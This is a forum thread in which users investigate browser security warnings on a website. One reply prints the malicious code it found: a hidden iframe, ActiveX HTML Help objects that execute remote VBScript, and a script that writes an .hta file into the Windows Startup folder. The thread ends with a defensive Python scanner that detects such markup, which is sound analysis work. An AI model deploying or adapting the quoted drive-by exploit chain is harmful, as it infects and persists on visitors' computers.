Quote:

Can someone else with computer knowledge hit www.lukeisback.com and see if something there brings up a slew of security warnings? I'm thinking that one of his advertisers has nazi infiltrators.

It's trying to replace a file called c:\windows\system\hhctrl.ocx

I know this is offtopic for the cage but since we're all fascinated with his site, and know he reads the cage, maybe he can get it fixed. (I didn't let lukeisback replace any files on my computer).




hhctrl.ocx is the HTML Help ActiveX Control. Like most ActiveX controls it has its legitimate uses, but the whole ActiveX system is a security nightmare, relying on code being downloaded from "trustworthy" sites (thanks Microsoft.)

I didn't get the warning because I use Firefox, which purposefully ignores the whole ActiveX mess. I haven't missed it.

A quick dig through the source of Luke's site reveals this line at the very end to be the offender:

<iframe src="http://www.outdoornewswire.com/iesploit/spatch.htm" frameborder=0 width=0 height=0 marginwidth=0 marginheight=0 scrolling=no></iframe>

Which references this code hosted on outdoornewswire.com:

<OBJECT id="localpage" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7% style="position:absolute;top:140;left:72;z-index:100;" codebase="hhctrl.ocx#Version=5,2,3790,1194" width="7%">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:Just a button">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1" value="command;file://C:\WINDOWS\PCHealth\HelpCtr\System\blurbs\tools.htm">
</OBJECT>

<OBJECT id="inject" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7% style="position:absolute;top:140;left:72;z-index:100;" codebase="hhctrl.ocx#Version=5,2,3790,1194" width="7%">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:Just a button">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1" value='command;javascript:execScript("document.write(\"<script language=\\\"vbscript\\\" src=\\\"http://www.outdoornewswire.com/iesploit/writehta.txt\\\"\"+String.fromCharCode(62)+\"</scr\"+\"ipt\"+String.fromCharCode(62))")'>
</OBJECT>

<script>
localpage.HHClick();
setTimeout("inject.HHClick()",100);
</script>


Which references this VBScript code hosted in the text file writehta.txt on outdoornewswire.com:

on error resume next
Dim Conn, rs
Set Conn = CreateObject("ADODB.Connection")
Conn.Open "Driver={Microsoft Text Driver (*.txt; *.csv)};" & _
"Dbq=http://www.outdoornewswire.com;" & _
"Extensions=asc,csv,tab,txt;" & _
"Persist Security Info=False"
Dim sql
sql = "SELECT * from foobar.txt"
set rs = conn.execute(sql)
set rs = CreateObject("ADODB.recordset")
rs.Open "SELECT * from foobar.txt", conn
rs.Save "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Microsoft Office.hta", adPersistXML
rs.close
conn.close


I don't know enough to figure out exactly what it all does, but I don't like the look of it.
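
The manual "dig through the source" described in the post above can be automated. The following is an added example, not part of the original post: a small Python scanner that flags zero-size iframes pointing at another host and OBJECT tags that instantiate the HTML Help control with a "command;" item. The hosts in the sample are placeholders, the sample markup is constructed, and the heuristics (what counts as "hidden", the finding names) are assumptions made for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# CLSID of the HTML Help ActiveX control (hhctrl.ocx), as quoted in the post.
HHCTRL_CLSID = "clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"

class HiddenLoaderScanner(HTMLParser):
    """Records hidden off-site iframes and scripted HTML Help objects."""
    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.in_hhctrl = False   # True while inside an <object> using HHCTRL_CLSID
        self.findings = []       # list of (finding_name, detail) tuples

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "iframe":
            host = (urlparse(a.get("src", "")).hostname or "").lower()
            hidden = a.get("width") == "0" or a.get("height") == "0"
            if hidden and host and host != self.page_host:
                self.findings.append(("hidden-offsite-iframe", host))
        elif tag == "object":
            self.in_hhctrl = a.get("classid", "").lower() == HHCTRL_CLSID
            if self.in_hhctrl:
                self.findings.append(("hhctrl-object", a.get("id", "")))
        elif tag == "param" and self.in_hhctrl:
            # Item values of the form "command;<target>" make the control open <target>.
            verb, _, target = a.get("value", "").lower().partition(";")
            if verb == "command":
                kind = "script" if target.startswith("javascript:") else "non-script"
                self.findings.append(("hhctrl-command", kind))

    def handle_endtag(self, tag):
        if tag == "object":
            self.in_hhctrl = False

def scan(html, page_host):
    """Return the findings for one page, in document order."""
    scanner = HiddenLoaderScanner(page_host)
    scanner.feed(html)
    return scanner.findings

# Constructed sample modelled on the markup in the post; hosts are placeholders.
SAMPLE = """
<iframe src="http://ads.example.invalid/x.htm" frameborder=0 width=0 height=0></iframe>
<object id="inject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">
<param name="Item1" value="command;javascript:void(0)">
</object>
<iframe src="http://blog.example.invalid/widget.htm" width="300" height="250"></iframe>
"""
print(scan(SAMPLE, "blog.example.invalid"))
```

A visible same-site iframe produces no finding; any hit is a prompt to read the referenced page by hand, not proof of compromise.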